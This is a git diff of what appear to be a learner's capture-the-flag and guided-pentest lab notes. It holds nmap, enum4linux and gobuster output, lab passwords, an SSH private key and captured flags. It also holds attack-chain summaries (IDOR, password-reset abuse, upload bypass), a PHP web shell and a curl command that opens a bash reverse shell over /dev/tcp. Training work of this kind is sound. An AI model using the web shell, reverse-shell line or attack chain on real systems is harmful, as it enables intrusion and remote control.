\x01\x02__MSBROWSE__\x02<01> Flags: +| <00> Flags: +| <03> Flags: +| <20> Flags: +| WORKGROUP<00> Flags: +| WORKGROUP<1d> Flags: +| WORKGROUP<1e> Flags: +| Statistics: +| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +|_clock-skew: -1s +| p2p-conficker: +| Checking for Conficker.C or higher... +| Check 1 (port 12380/tcp): CLEAN (Couldn't connect) +| Check 2 (port 35520/tcp): CLEAN (Couldn't connect) +| Check 3 (port 58973/udp): CLEAN (Failed to receive data) +| Check 4 (port 57845/udp): CLEAN (Failed to receive data) +|_ 0/4 checks are positive: Host is CLEAN or ports are blocked +| smb2-security-mode: +| 3.1.1: +|_ Message signing enabled but not required + +TRACEROUTE (using port 1025/tcp) +HOP RTT ADDRESS +1 218.41 ms 192.168.128.1 +2 ... +3 218.76 ms 10.81.148.220 + +Read data files from: /usr/share/nmap +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri May 8 14:58:58 2026 -- 1 IP address (1 host up) scanned in 810.36 seconds diff --git a/CTF/VulNetInternal/redis_pass.txt b/CTF/VulNetInternal/redis_pass.txt new file mode 100644 index 0000000..c27f139 --- /dev/null +++ b/CTF/VulNetInternal/redis_pass.txt @@ -0,0 +1 @@ +B65Hx562F@ggAZ@F diff --git a/CTF/VulNetInternal/rsync/id_rsa b/CTF/VulNetInternal/rsync/id_rsa new file mode 100644 index 0000000..97c8079 --- /dev/null +++ b/CTF/VulNetInternal/rsync/id_rsa @@ -0,0 +1,7 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW +QyNTUxOQAAACBh5zieFCGh1stlOmiafc07xEtedT3qin/0/DpWKNJBtAAAAJgf0D9MH9A/ +TAAAAAtzc2gtZWQyNTUxOQAAACBh5zieFCGh1stlOmiafc07xEtedT3qin/0/DpWKNJBtA +AAAEAOW/3nmJPXdajcfFshsCDy55x6hiYV8XEijSAUTcPaTmHnOJ4UIaHWy2U6aJp9zTvE +S151PeqKf/T8OlYo0kG0AAAAEW5pa0BrYWxpLWxlYXJuaW5nAQIDBA== +-----END OPENSSH PRIVATE KEY----- diff --git a/CTF/VulNetInternal/rsync/id_rsa.pub b/CTF/VulNetInternal/rsync/id_rsa.pub new file mode 100644 index 0000000..178310f --- /dev/null +++ b/CTF/VulNetInternal/rsync/id_rsa.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGHnOJ4UIaHWy2U6aJp9zTvES151PeqKf/T8OlYo0kG0 nik@kali-learning diff --git a/CTF/VulNetInternal/rsync/user.txt b/CTF/VulNetInternal/rsync/user.txt new file mode 100644 index 0000000..fef7f11 --- /dev/null +++ b/CTF/VulNetInternal/rsync/user.txt @@ -0,0 +1 @@ +THM{da7c20696831f253e0afaca8b83c07ab} diff --git a/CTF/VulNetInternal/rsync_auth.txt b/CTF/VulNetInternal/rsync_auth.txt new file mode 100644 index 0000000..4dd316a --- /dev/null +++ b/CTF/VulNetInternal/rsync_auth.txt @@ -0,0 +1 @@ +Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v diff --git a/CTF/VulNetInternal/services.txt b/CTF/VulNetInternal/services.txt new file mode 100644 index 0000000..6c1f7d7 --- /dev/null +++ b/CTF/VulNetInternal/services.txt @@ -0,0 +1 @@ +THM{0a09d51e488f5fa105d8d866a497440a} diff --git a/CTF/VulNetInternal/smb_enumeration.txt b/CTF/VulNetInternal/smb_enumeration.txt new file mode 100644 index 0000000..ed56d5d --- /dev/null +++ b/CTF/VulNetInternal/smb_enumeration.txt @@ -0,0 +1,193 @@ +Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 8 16:33:16 2026 + + =========================================( Target Information )========================================= + +Target ........... 10.81.148.220 +RID Range ........ 500-550,1000-1050 +Username ......... '' +Password ......... '' +Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none + + + ===========================( Enumerating Workgroup/Domain on 10.81.148.220 )=========================== + + +[+] Got domain/workgroup name: WORKGROUP + + + ===============================( Nbtstat Information for 10.81.148.220 )=============================== + +Looking up status of 10.81.148.220 + ..__MSBROWSE__. <01> - B Master Browser + <00> - B + <03> - B + <20> - B + WORKGROUP <00> - B Domain/Workgroup Name + WORKGROUP <1d> - B Master Browser + WORKGROUP <1e> - B Browser Service Elections + + MAC Address = 00-00-00-00-00-00 + + ===================================( Session Check on 10.81.148.220 )=================================== + + +[+] Server 10.81.148.220 allows sessions using username '', password '' + + + ================================( Getting domain SID for 10.81.148.220 )================================ + +Domain Name: WORKGROUP +Domain Sid: (NULL SID) + +[+] Can't determine if host is part of domain or part of a workgroup + + + ==================================( OS information on 10.81.148.220 )================================== + + +[E] Can't get OS info with smbclient + + +[+] Got OS info for 10.81.148.220 from srvinfo: + IP-10-81-148-22Wk Sv PrQ Unx NT SNT ip-10-81-148-220 server (Samba, Ubuntu) + platform_id : 500 + os version : 6.1 + server type : 0x809a03 + + + =======================================( Users on 10.81.148.220 )======================================= + + + + =================================( Share Enumeration on 10.81.148.220 )================================= + +smbXcli_negprot_smb1_done: No compatible protocol selected by server. + + Sharename Type Comment + --------- ---- ------- + print$ Disk Printer Drivers + shares Disk VulnNet Business Shares + IPC$ IPC IPC Service (ip-10-81-148-220 server (Samba, Ubuntu)) +Reconnecting with SMB1 for workgroup listing. +Protocol negotiation to server 10.81.148.220 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE +Unable to connect with SMB1 -- no workgroup available + +[+] Attempting to map shares on 10.81.148.220 + +//10.81.148.220/print$ Mapping: DENIED Listing: N/A Writing: N/A +//10.81.148.220/shares Mapping: OK Listing: OK Writing: N/A + +[E] Can't understand response: + +NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* +//10.81.148.220/IPC$ Mapping: N/A Listing: N/A Writing: N/A + + ===========================( Password Policy Information for 10.81.148.220 )=========================== + + + +[+] Attaching to 10.81.148.220 using a NULL share + +[+] Trying protocol 139/SMB... + +[+] Found domain(s): + + [+] IP-10-81-148-220 + [+] Builtin + +[+] Password Info for Domain: IP-10-81-148-220 + + [+] Minimum password length: 5 + [+] Password history length: None + [+] Maximum password age: 136 years 37 days 6 hours 21 minutes + [+] Password Complexity Flags: 000000 + + [+] Domain Refuse Password Change: 0 + [+] Domain Password Store Cleartext: 0 + [+] Domain Password Lockout Admins: 0 + [+] Domain Password No Clear Change: 0 + [+] Domain Password No Anon Change: 0 + [+] Domain Password Complex: 0 + + [+] Minimum password age: None + [+] Reset Account Lockout Counter: 30 minutes + [+] Locked Account Duration: 30 minutes + [+] Account Lockout Threshold: None + [+] Forced Log off Time: 136 years 37 days 6 hours 21 minutes + + + +[+] Retieved partial password policy with rpcclient: + + +Password Complexity: Disabled +Minimum Password Length: 5 + + + ======================================( Groups on 10.81.148.220 )====================================== + + +[+] Getting builtin groups: + + +[+]  Getting builtin group memberships: + + +[+]  Getting local groups: + + +[+]  Getting local group memberships: + + +[+]  Getting domain groups: + + +[+]  Getting domain group memberships: + + + ==================( Users on 10.81.148.220 via RID cycling (RIDS: 500-550,1000-1050) )================== + + +[I] Found new SID: +S-1-22-1 + +[I] Found new SID: +S-1-5-32 + +[I] Found new SID: +S-1-5-32 + +[I] Found new SID: +S-1-5-32 + +[I] Found new SID: +S-1-5-32 + +[+] Enumerating users using SID S-1-5-32 and logon username '', password '' + +S-1-5-32-544 BUILTIN\Administrators (Local Group) +S-1-5-32-545 BUILTIN\Users (Local Group) +S-1-5-32-546 BUILTIN\Guests (Local Group) +S-1-5-32-547 BUILTIN\Power Users (Local Group) +S-1-5-32-548 BUILTIN\Account Operators (Local Group) +S-1-5-32-549 BUILTIN\Server Operators (Local Group) +S-1-5-32-550 BUILTIN\Print Operators (Local Group) + +[+] Enumerating users using SID S-1-5-21-4177045482-676087334-2392555964 and logon username '', password '' + +S-1-5-21-4177045482-676087334-2392555964-501 IP-10-81-148-220\nobody (Local User) +S-1-5-21-4177045482-676087334-2392555964-513 IP-10-81-148-220\None (Domain Group) + +[+] Enumerating users using SID S-1-22-1 and logon username '', password '' + +S-1-22-1-1000 Unix User\sys-internal (Local User) +S-1-22-1-1001 Unix User\ssm-user (Local User) +S-1-22-1-1002 Unix User\ubuntu (Local User) + + ===============================( Getting printer info for 10.81.148.220 )=============================== + +No printers returned. + + +enum4linux complete on Fri May 8 16:37:34 2026 + diff --git a/CTF/YearOfTheRabbit/Eli's_Creds.txt b/CTF/YearOfTheRabbit/Eli's_Creds.txt new file mode 100644 index 0000000..6a6eb59 --- /dev/null +++ b/CTF/YearOfTheRabbit/Eli's_Creds.txt @@ -0,0 +1,11 @@ ++++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->- +--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+ +++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+ ++++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++< +]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+ +++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->--- +--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++ ++<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+ +++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++ +<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++ +<]>+. <+++[ ->--- <]>-- ---.- ----. < diff --git a/CTF/YearOfTheRabbit/Hot_Babe.png b/CTF/YearOfTheRabbit/Hot_Babe.png new file mode 100644 index 0000000..1a8815e Binary files /dev/null and b/CTF/YearOfTheRabbit/Hot_Babe.png differ diff --git a/CTF/YearOfTheRabbit/eli_message.txt b/CTF/YearOfTheRabbit/eli_message.txt new file mode 100644 index 0000000..424f922 --- /dev/null +++ b/CTF/YearOfTheRabbit/eli_message.txt @@ -0,0 +1,7 @@ +1 new message +Message from Root to Gwendoline: + +"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there" + +END MESSAGE + diff --git a/CTF/YearOfTheRabbit/ftp_password.txt b/CTF/YearOfTheRabbit/ftp_password.txt new file mode 100644 index 0000000..55b4aa7 --- /dev/null +++ b/CTF/YearOfTheRabbit/ftp_password.txt @@ -0,0 +1,80 @@ +A56IpIl%1s02u +vTFbDzX9&Nmu? +FfF~sfu^UQZmT +8FF?iKO27b~V0 +ua4W~2-@y7dE$ +3j39aMQQ7xFXT +Wb4--CTc4ww*- +u6oY9?nHv84D& +0iBp4W69Gr_Yf +TS*%miyPsGV54 +C77O3FIy0c0sd +O14xEhgg0Hxz1 +5dpv#Pr$wqH7F +1G8Ucoce1+gS5 +0plnI%f0~Jw71 +0kLoLzfhqq8u& +kS9pn5yiFGj6d +zeff4#!b5Ib_n +rNT4E4SHDGBkl +KKH5zy23+S0@B +3r6PHtM4NzJjE +gm0!!EC1A0I2? +HPHr!j00RaDEi +7N+J9BYSp4uaY +PYKt-ebvtmWoC +3TN%cD_E6zm*s +eo?@c!ly3&=0Z +nR8&FXz$ZPelN +eE4Mu53UkKHx# +86?004F9!o49d +SNGY0JjA5@0EE +trm64++JZ7R6E +3zJuGL~8KmiK^ +CR-ItthsH%9du +yP9kft386bB8G +A-*eE3L@!4W5o +GoM^$82l&GA5D +1t$4$g$I+V_BH +0XxpTd90Vt8OL +j0CN?Z#8Bp69_ +G#h~9@5E5QA5l +DRWNM7auXF7@j +Fw!if_=kk7Oqz +92d5r$uyw!vaE +c-AA7a2u!W2*? +zy8z3kBi#2e36 +J5%2Hn+7I6QLt +gL$2fmgnq8vI* +Etb?i?Kj4R=QM +7CabD7kwY7=ri +4uaIRX~-cY6K4 +kY1oxscv4EB2d +k32?3^x1ex7#o +ep4IPQ_=ku@V8 +tQxFJ909rd1y2 +5L6kpPR5E2Msn +65NX66Wv~oFP2 +LRAQ@zcBphn!1 +V4bt3*58Z32Xe +ki^t!+uqB?DyI +5iez1wGXKfPKQ +nJ90XzX&AnF5v +7EiMd5!r%=18c +wYyx6Eq-T^9#@ +yT2o$2exo~UdW +ZuI-8!JyI6iRS +PTKM6RsLWZ1&^ +3O$oC~%XUlRO@ +KW3fjzWpUGHSW +nTzl5f=9eS&*W +WS9x0ZF=x1%8z +Sr4*E4NT5fOhS +hLR3xQV*gHYuC +4P3QgF5kflszS +NIZ2D%d58*v@R +0rJ7p%6Axm05K +94rU30Zx45z5c +Vi^Qf+u%0*q_S +1Fvdp&bNl3#&l +zLH%Ot0Bw&c%9 diff --git a/CTF/YearOfTheRabbit/gobuster_scan_01.txt b/CTF/YearOfTheRabbit/gobuster_scan_01.txt new file mode 100644 index 0000000..dd2ce80 --- /dev/null +++ b/CTF/YearOfTheRabbit/gobuster_scan_01.txt @@ -0,0 +1 @@ +assets  (Status: 301) [Size: 315] [--> http://10.82.186.203/assets/] diff --git a/CTF/YearOfTheRabbit/gwendoline_pwd.txt b/CTF/YearOfTheRabbit/gwendoline_pwd.txt new file mode 100644 index 0000000..78eab94 --- /dev/null +++ b/CTF/YearOfTheRabbit/gwendoline_pwd.txt @@ -0,0 +1 @@ +MniVCQVhQHUNI diff --git a/CTF/YearOfTheRabbit/ip.txt b/CTF/YearOfTheRabbit/ip.txt new file mode 100644 index 0000000..2ac6963 --- /dev/null +++ b/CTF/YearOfTheRabbit/ip.txt @@ -0,0 +1 @@ +10.82.186.203 diff --git a/CTF/YearOfTheRabbit/nmap_scan_01.txt b/CTF/YearOfTheRabbit/nmap_scan_01.txt new file mode 100644 index 0000000..14893b2 --- /dev/null +++ b/CTF/YearOfTheRabbit/nmap_scan_01.txt @@ -0,0 +1,40 @@ +# Nmap 7.99 scan initiated Fri May 8 08:53:11 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_01.txt 10.82.186.203 +Nmap scan report for 10.82.186.203 +Host is up (0.15s latency). +Not shown: 65532 closed tcp ports (reset) +PORT STATE SERVICE VERSION +21/tcp open ftp vsftpd 3.0.2 +22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) +| ssh-hostkey: +| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA) +| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA) +| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA) +|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519) +80/tcp open http Apache httpd 2.4.10 ((Debian)) +|_http-title: Apache2 Debian Default Page: It works +|_http-server-header: Apache/2.4.10 (Debian) +No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). +TCP/IP fingerprint: +OS:SCAN(V=7.99%E=4%D=5/8%OT=21%CT=1%CU=35695%PV=Y%DS=3%DC=T%G=Y%TM=69FD8BC3 +OS:%P=aarch64-unknown-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS= +OS:8)SEQ(SP=105%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=10A% +OS:TI=Z%CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(O1= +OS:M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E8NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7 +OS:%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y +OS:%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD +OS:=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%D +OS:F=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O +OS:=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40 +OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) + +Network Distance: 3 hops +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 554/tcp) +HOP RTT ADDRESS +1 102.75 ms 192.168.128.1 +2 ... +3 241.60 ms 10.82.186.203 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri May 8 09:07:47 2026 -- 1 IP address (1 host up) scanned in 876.16 seconds diff --git a/CTF/YearOfTheRabbit/nmap_scan_02.txt b/CTF/YearOfTheRabbit/nmap_scan_02.txt new file mode 100644 index 0000000..85f9999 --- /dev/null +++ b/CTF/YearOfTheRabbit/nmap_scan_02.txt @@ -0,0 +1,22 @@ +# Nmap 7.99 scan initiated Fri May 8 09:06:28 2026 as: /usr/lib/nmap/nmap --privileged -p80 -sV --script http-headers -oN nmap_scan_02.txt 10.82.186.203 +Nmap scan report for 10.82.186.203 +Host is up (0.052s latency). + +PORT STATE SERVICE VERSION +80/tcp open http Apache httpd 2.4.10 ((Debian)) +| http-headers: +| Date: Fri, 08 May 2026 07:06:35 GMT +| Server: Apache/2.4.10 (Debian) +| Last-Modified: Thu, 23 Jan 2020 00:34:26 GMT +| ETag: "1ead-59cc3cda1f3a4" +| Accept-Ranges: bytes +| Content-Length: 7853 +| Vary: Accept-Encoding +| Connection: close +| Content-Type: text/html +| +|_ (Request type: HEAD) +|_http-server-header: Apache/2.4.10 (Debian) + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri May 8 09:06:36 2026 -- 1 IP address (1 host up) scanned in 8.12 seconds diff --git a/Walkthroughs/GuidedPentestInfrastructure/attack_chain.txt b/Walkthroughs/GuidedPentestInfrastructure/attack_chain.txt new file mode 100644 index 0000000..c8bf836 --- /dev/null +++ b/Walkthroughs/GuidedPentestInfrastructure/attack_chain.txt @@ -0,0 +1,5 @@ +Exploitation Steps: + +1. Obtain a low-privileged shell on the target system, via UnrealIRCD exploit. +2. Read the contents of /etc/password.txt using cat /etc/password.txt. +3. Use the discovered root password to escalate privileges via ssh root@IP. diff --git a/Walkthroughs/GuidedPentestInfrastructure/nmap_scan01.txt b/Walkthroughs/GuidedPentestInfrastructure/nmap_scan01.txt new file mode 100644 index 0000000..1a8d3e5 --- /dev/null +++ b/Walkthroughs/GuidedPentestInfrastructure/nmap_scan01.txt @@ -0,0 +1,25 @@ +# Nmap 7.99 scan initiated Sun May 31 10:43:02 2026 as: /usr/lib/nmap/nmap --privileged -sV -sC -p- -oN nmap_scan01.txt 10.80.133.13 +Nmap scan report for 10.80.133.13 +Host is up (0.057s latency). +Not shown: 65533 closed tcp ports (reset) +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 256 b1:3e:c2:56:97:97:4b:c7:2e:dd:a7:49:d3:ee:90:08 (ECDSA) +|_ 256 74:6c:01:a3:6c:6d:7b:17:09:f6:38:d0:11:ad:0f:4c (ED25519) +6667/tcp open irc UnrealIRCd +| irc-info: +| users: 1 +| servers: 1 +| lusers: 1 +| lservers: 0 +| server: irc.pentest-target.thm +| version: Unreal3.2.8.1. irc.pentest-target.thm +| uptime: 0 days, 0:05:14 +| source ident: nmap +| source host: ip-192-168-138-181.eu-west-1.compute.internal +|_ error: Closing Link: jkzwzulpy[ip-192-168-138-181.eu-west-1.compute.internal] (Quit: jkzwzulpy) +Service Info: Host: irc.pentest-target.thm; OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sun May 31 10:46:16 2026 -- 1 IP address (1 host up) scanned in 194.45 seconds diff --git a/Walkthroughs/GuidedPentestWeb/IDOR_insecure-direct-object-reference.txt b/Walkthroughs/GuidedPentestWeb/IDOR_insecure-direct-object-reference.txt new file mode 100644 index 0000000..444f78f --- /dev/null +++ b/Walkthroughs/GuidedPentestWeb/IDOR_insecure-direct-object-reference.txt @@ -0,0 +1,7 @@ +Original URL after Login + + http://10.80.158.146/profile.php?id=6 + +IDOR vulnerable + + http://10.80.158.146/profile.php?id=1 diff --git a/Walkthroughs/GuidedPentestWeb/admin_email.txt b/Walkthroughs/GuidedPentestWeb/admin_email.txt new file mode 100644 index 0000000..f8d2f99 --- /dev/null +++ b/Walkthroughs/GuidedPentestWeb/admin_email.txt @@ -0,0 +1 @@ +s.mitchell@recruitx.thm diff --git a/Walkthroughs/GuidedPentestWeb/attack_chain.txt b/Walkthroughs/GuidedPentestWeb/attack_chain.txt new file mode 100644 index 0000000..c50b218 --- /dev/null +++ b/Walkthroughs/GuidedPentestWeb/attack_chain.txt @@ -0,0 +1,5 @@ +1. Enumeration: We discovered the application's technology stack (Apache, PHP, MySQL), its directory structure, an API endpoint, a password reset page, an uploads directory, and an admin panel. +2. IDOR (Task 3): The /profile.php?id= parameter and the /api/user?id= endpoint allowed us to enumerate all users, including the administrator's name and email address. +3. Weak Password Reset (Task 4): The reset mechanism displayed tokens directly in the HTTP response, allowing us to generate a token for the administrator and change her password. +4. Admin Panel Access (Task 5): Using the compromised administrator account, we accessed the admin panel and found a file upload function with an incomplete extension blocklist. +5. Remote Code Execution (Task 6): We uploaded a PHP web shell using the .phtml extension, which bypassed the filter. This gave us command execution on the server and a path to a full reverse shell. diff --git a/Walkthroughs/GuidedPentestWeb/gobuster_scan01.txt b/Walkthroughs/GuidedPentestWeb/gobuster_scan01.txt new file mode 100644 index 0000000..0bb186a --- /dev/null +++ b/Walkthroughs/GuidedPentestWeb/gobuster_scan01.txt @@ -0,0 +1,15 @@ +index.php  (Status: 200) [Size: 21600] +login.php  (Status: 200) [Size: 15107] +register.php  (Status: 200) [Size: 14802] +profile.php  (Status: 302) [Size: 0] [--> /login.php] +jobs.php  (Status: 200) [Size: 27698] +uploads  (Status: 301) [Size: 316] [--> http://10.80.158.146/uploads/] +data  (Status: 403) [Size: 278] +admin  (Status: 301) [Size: 314] [--> http://10.80.158.146/admin/] +test  (Status: 200) [Size: 705] +includes  (Status: 301) [Size: 317] [--> http://10.80.158.146/includes/] +api  (Status: 301) [Size: 312] [--> http://10.80.158.146/api/] +logout.php  (Status: 302) [Size: 0] [--> /login.php] +config  (Status: 301) [Size: 315] [--> http://10.80.158.146/config/] +dashboard.php  (Status: 302) [Size: 0] [--> /login.php] +reset.php  (Status: 200) [Size: 14408] diff --git a/Walkthroughs/GuidedPentestWeb/nmap_scan01.txt b/Walkthroughs/GuidedPentestWeb/nmap_scan01.txt new file mode 100644 index 0000000..8703099 --- /dev/null +++ b/Walkthroughs/GuidedPentestWeb/nmap_scan01.txt @@ -0,0 +1,25 @@ +# Nmap 7.99 scan initiated Sat May 30 21:03:47 2026 as: /usr/lib/nmap/nmap --privileged -sV -sC -p- -oN nmap_scan01.txt 10.80.158.146 +Nmap scan report for 10.80.158.146 +Host is up (0.049s latency). +Not shown: 65531 closed tcp ports (reset) +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 256 cb:60:76:ef:27:b1:ba:4a:7d:ed:b0:78:ae:ad:21:46 (ECDSA) +|_ 256 4e:c2:ef:35:5f:b0:e4:02:0e:30:a2:3f:e7:e2:6a:80 (ED25519) +80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) +|_http-title: RecruitX - Home +|_http-server-header: Apache/2.4.58 (Ubuntu) +| http-cookie-flags: +| /: +| PHPSESSID: +|_ httponly flag not set +3306/tcp open mysql MySQL (unauthorized) +8080/tcp open http Apache httpd 2.4.58 ((Ubuntu)) +|_http-server-header: Apache/2.4.58 (Ubuntu) +|_http-open-proxy: Proxy might be redirecting requests +|_http-title: Apache2 Ubuntu Default Page: It works +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat May 30 21:07:33 2026 -- 1 IP address (1 host up) scanned in 226.96 seconds diff --git a/Walkthroughs/GuidedPentestWeb/reverse_shell.txt b/Walkthroughs/GuidedPentestWeb/reverse_shell.txt new file mode 100644 index 0000000..255db10 --- /dev/null +++ b/Walkthroughs/GuidedPentestWeb/reverse_shell.txt @@ -0,0 +1 @@ +curl "http://10.80.158.146/uploads/documents/shell.phtml?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/CONNECTION_IP/4444+0>%261'" diff --git a/Walkthroughs/GuidedPentestWeb/shell.phtml b/Walkthroughs/GuidedPentestWeb/shell.phtml new file mode 100644 index 0000000..e82b417 --- /dev/null +++ b/Walkthroughs/GuidedPentestWeb/shell.phtml @@ -0,0 +1,5 @@ +" . shell_exec($_GET['cmd']) . ""; +} +?> diff --git a/Walkthroughs/GuidedPentestWeb/test.php b/Walkthroughs/GuidedPentestWeb/test.php new file mode 100644 index 0000000..8c2b36d --- /dev/null +++ b/Walkthroughs/GuidedPentestWeb/test.php @@ -0,0 +1 @@ + diff --git a/Walkthroughs/GuidedPentestWeb/test.phtml b/Walkthroughs/GuidedPentestWeb/test.phtml new file mode 100644 index 0000000..8c2b36d --- /dev/null +++ b/Walkthroughs/GuidedPentestWeb/test.phtml @@ -0,0 +1 @@ + diff --git a/Walkthroughs/GuidedPentestWeb/test.txt b/Walkthroughs/GuidedPentestWeb/test.txt new file mode 100644 index 0000000..557db03 --- /dev/null +++ b/Walkthroughs/GuidedPentestWeb/test.txt @@ -0,0 +1 @@ +Hello World